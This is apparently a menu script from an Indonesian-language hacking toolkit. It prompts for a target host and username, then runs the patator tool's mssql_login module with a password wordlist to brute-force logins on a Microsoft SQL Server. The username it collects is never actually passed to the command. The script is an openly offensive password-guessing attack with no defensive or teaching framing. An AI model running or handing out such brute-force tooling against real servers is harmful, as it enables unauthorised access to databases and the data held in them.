#!/bin/bash
clear
echo "\033[32;1m            ..::|[ MSSQL BruteForce ]|::..\033[0m"
echo "









"
echo -n "\n\033[31;1mMasukan Host Atau IP : "
read host
echo -n "\nMasukan UserName : \033[0m"
read user


echo "
\033[0m
"
cd ../xx/
python2 patator mssql_login host=$host password=FILE0 0=../wodlis/passwords.lst -x ignore:fgrep='Login failed for user'
echo " "
echo "
=> Tekan \033[33mB\033[0m untuk kembali
=> Tekan \033[31mK\033[0m untuk keluar"
echo -n "=> Pilihan: "
read upil
if [ $upil = b ] || [ $upil = B ]
then
clear
sh start
fi

if [ $upil = k ] || [ $upil = K ]
then
clear
sh exit
fi

